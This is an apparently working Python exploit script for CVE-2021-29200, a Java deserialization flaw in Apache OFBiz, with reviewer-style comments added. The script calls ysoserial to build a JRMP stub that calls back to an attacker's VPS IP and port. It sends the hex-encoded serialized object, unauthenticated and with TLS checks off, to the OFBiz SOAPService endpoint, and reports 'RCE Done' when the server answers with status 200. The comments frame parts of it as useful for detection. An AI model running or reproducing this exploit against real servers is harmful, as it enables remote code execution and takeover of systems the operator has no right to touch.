#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/3/24-15:09
"""
import subprocess
import sys
from urllib.parse import urlparse
import requests
import urllib3
# Silence the InsecureRequestWarning that requests/urllib3 would otherwise
# emit on every call, because exp() below posts with verify=False (server
# certificate validation disabled).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
    """Write the tool banner (ASCII art plus the CVE id) to stdout.

    The text is held in a local so the literal is kept byte-for-byte; it is
    written through sys.stdout exactly as print() would, followed by a
    newline.
    """
    art = """
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-29200 Powered by r0cky Team ZionLab
===================================================
"""
    out = sys.stdout
    out.write(art)
    out.write("\n")
def exp(url, vps_ip, vps_port):
    """Run an external ysoserial jar for a JRMP stub and POST its output, hex-encoded, to *url*.

    Args:
        url: Full URL of the OFBiz SOAP endpoint; built by the __main__ block
            from the scheme and host[:port] of the first CLI argument.
        vps_ip: Host the generated stub refers back to (string).
        vps_port: Port on that host (string, passed through unchanged).

    Returns:
        None. Progress is printed to stdout. exit(-1) is called when the jar
        produced no bytes on stdout.

    Observable artifacts, as produced by the code below (useful for detection
    and incident reconstruction):
        - one HTTP POST to *url*, no authentication, header
          ``Content-Type: text/xml`` (module-level ``headers``),
        - body = uppercase hex of a serialized Java object, framed by newlines,
        - client-side TLS verification disabled (``verify=False``),
        - a "success" decision based solely on HTTP status 200.
    """
    # Only stdout of the child is captured; stderr is not, and the process is
    # never waited on. A jar that fails to start yields an empty payload and is
    # reported by the message below. If the ``java`` binary itself is absent,
    # Popen raises FileNotFoundError before any of this runs.
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-stub.jar', "JRMPStubClient", "{}:{}".format(vps_ip, vps_port)], stdout=subprocess.PIPE)
    payload = popen.stdout.read()
    if len(payload) == 0:
        # Message reads: "Please place ysoserial.jar in the current script
        # directory!" — note it names ysoserial.jar while Popen above runs
        # ysoserial-stub.jar; presumably the same file, but verify.
        print("请在当前脚本目录放置ysoserial.jar!")
        # Builtin exit() raises SystemExit, which the bare ``except:`` in
        # __main__ catches and turns into a usage message.
        exit(-1)
    # Hex-encode the raw serialized bytes and uppercase them; this string,
    # wrapped in newlines below, is the entire request body.
    post_data = payload.hex().upper()
    print("[+] Payload:", post_data)
    data = """
{}
""".format(post_data)
    print("[+] payload sending...")
    # ``headers`` is a module global defined after this function and resolved
    # at call time. verify=False disables certificate checks for this request.
    r = requests.post(url, data=data, headers=headers, verify=False)
    # Success is inferred only from the status code; the response body is not
    # inspected, so a 200 here does not by itself confirm anything happened
    # server-side.
    if r.status_code == 200:
        print("[+] send payload success.")
        print()
        print("[END] Apache OFBiz RCE Done.")
    else:
        print("[-] send payload failed.")
        print()
        print("[END] Apache OFBiz RCE failed.")
# Request headers used by exp() (looked up as a module global at call time,
# so defining it after the function is fine). text/xml matches the SOAP
# endpoint the URL in __main__ points at.
headers={"Content-Type": "text/xml"}
if __name__ == '__main__':
    # CLI entry point. Usage, per the arguments read below:
    #     python3 <script> <target-url> <vps_ip> <vps_port>
    banner()
    try:
        target = sys.argv[1]
        vps_ip = sys.argv[2]
        vps_port = sys.argv[3]
        # target = "https://192.168.80.136:8443"
        # vps_ip = "10.20.28.16"
        # vps_port = "9999"
        # Only scheme and host[:port] of the argument are kept; any path the
        # user supplied is discarded and replaced by the fixed endpoint below.
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        url = "{}/webtools/control/SOAPService".format(target)
        exp(url, vps_ip, vps_port)
    # NOTE(review): a bare ``except:`` catches every BaseException raised in
    # the block above — the IndexError it is evidently meant for, but also
    # SystemExit from exit(-1) in exp(), KeyboardInterrupt, FileNotFoundError
    # when ``java`` is missing, and requests' connection errors — and reports
    # all of them as a usage error, so the real cause is never shown and the
    # process ends with exit status 0.
    except:
        print("Example: \n\tpython3 " + sys.argv[0] + " \n")